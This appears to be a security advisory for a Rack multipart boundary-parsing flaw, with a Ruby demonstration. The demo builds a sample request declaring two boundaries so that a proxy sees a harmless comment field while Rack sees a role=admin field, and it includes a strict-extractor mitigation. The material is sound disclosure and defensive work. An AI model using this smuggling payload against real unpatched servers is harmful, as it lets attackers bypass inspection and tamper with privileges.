CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Description
Rack is a modular Ruby web server interface. Prior to versions 2.2.23, 3.1.21, and 3.2.6, Rack::Multipart::Parser extracts the boundary parameter from multipart/form-data using a greedy regular expression. When a Content-Type header contains multiple boundary parameters, Rack selects the last one rather than the first. In deployments where an upstream proxy, WAF, or intermediary interprets the first boundary parameter, this mismatch can allow an attacker to smuggle multipart content past upstream inspection and have Rack parse a different body structure than the intermediary validated. This issue has been patched in versions 2.2.23, 3.1.21, and 3.2.6.
Analysis
Rack's multipart form data parser uses a greedy regular expression that selects the last boundary parameter from a Content-Type header instead of the first, allowing request smuggling when upstream proxies or WAFs interpret the first boundary. This mismatch enables attackers to bypass upstream inspection by crafting multipart requests with duplicate boundary declarations, causing Rack to parse a different body structure than the intermediary validated. …
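The disagreement the description and analysis above rely on, shown as an added illustration rather than Rack's source, its patch, or any proxy's code: a greedy boundary regex binds to the last boundary parameter in a Content-Type header while a first-match regex binds to the first, so one constructed body parses into two different multipart structures. The two regular expressions, the small multipart splitter, the `views` and `boundary_strict` helpers and the sample request are all constructed for this page; the exact patterns Rack used are not reproduced here.

```ruby
# Added illustration, not Rack's source or its patch: a greedy boundary regex
# and a first-match regex disagree on a Content-Type header that declares two
# boundaries, so the same body parses into different multipart structures.
# The patterns, splitter and request below are constructed for this example.

# Greedy variant: the leading `.*` consumes as much as possible, so the capture
# binds to the LAST boundary= parameter in the header.
GREEDY_BOUNDARY = /.*boundary=("[^"]*"|[^;,\s]+)/i

# First-match variant, the behaviour assumed for the upstream proxy or WAF.
FIRST_BOUNDARY = /boundary=("[^"]*"|[^;,\s]+)/i

def boundary_greedy(content_type)
  m = GREEDY_BOUNDARY.match(content_type)
  m && m[1].delete('"')
end

def boundary_first(content_type)
  m = FIRST_BOUNDARY.match(content_type)
  m && m[1].delete('"')
end

# Hardened extractor (example mitigation, not the shipped fix): use the first
# boundary and refuse a header that declares more than one, so no intermediary
# can hold a different view of the body than the application.
def boundary_strict(content_type)
  found = content_type.scan(FIRST_BOUNDARY).flatten
  return nil if found.empty?
  raise ArgumentError, "multiple boundary parameters in Content-Type" if found.size > 1
  found.first.delete('"')
end

# Minimal multipart/form-data splitter (RFC 2046 delimiter: CRLF "--" boundary).
# Returns { field name => body }. Text before the first delimiter is preamble
# and is ignored; the closing "--" after a delimiter ends the body.
def parse_multipart(body, boundary)
  delim = "--#{boundary}"
  parts = {}
  start = body.index(delim)
  return parts unless start
  rest = body[(start + delim.size)..-1]
  loop do
    break if rest.start_with?("--")           # closing delimiter reached
    rest = rest.sub(/\A\r\n/, "")
    stop = rest.index("\r\n#{delim}") or break
    part = rest[0...stop]
    rest = rest[(stop + 2 + delim.size)..-1]
    head, _, data = part.partition("\r\n\r\n")
    name = head[/name="([^"]*)"/, 1]
    parts[name] = data if name
  end
  parts
end

# What each side sees for one request: the intermediary uses the first
# boundary, the greedy parser the last.
def views(content_type, body)
  {
    intermediary:  parse_multipart(body, boundary_first(content_type)),
    greedy_parser: parse_multipart(body, boundary_greedy(content_type)),
  }
end

# Constructed attacker request (not captured traffic). Under boundary A the
# body is a single "comment" field whose value merely contains multipart
# syntax; under boundary B it is a "role" field set to "admin".
SMUGGLE_CONTENT_TYPE = 'multipart/form-data; boundary=A; boundary=B'
SMUGGLE_BODY = [
  '--A',
  'Content-Disposition: form-data; name="comment"',
  '',
  '--B',
  'Content-Disposition: form-data; name="role"',
  '',
  'admin',
  '--B--',
  '',
  '--A--',
  '',
].join("\r\n")

if $PROGRAM_NAME == __FILE__
  views(SMUGGLE_CONTENT_TYPE, SMUGGLE_BODY).each do |side, fields|
    puts "#{side}: #{fields.inspect}"
  end
  begin
    boundary_strict(SMUGGLE_CONTENT_TYPE)
  rescue ArgumentError => e
    puts "strict extractor: #{e.message}"
  end
end
```

Run stand-alone, the script prints the intermediary's view (one `comment` field containing opaque text) next to the greedy parser's view (`role` = `admin`), which is the body-structure mismatch the advisory describes. The `boundary_strict` extractor is a general defensive choice for this example: picking the first parameter alone would make the application agree with a first-match proxy, but rejecting any header with duplicate boundary declarations removes the ambiguity for every intermediary, and it is the check a WAF or application in front of an unpatched Rack can apply today.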
EUVD-2026-18368
GHSA-vgpv-f759-9wx3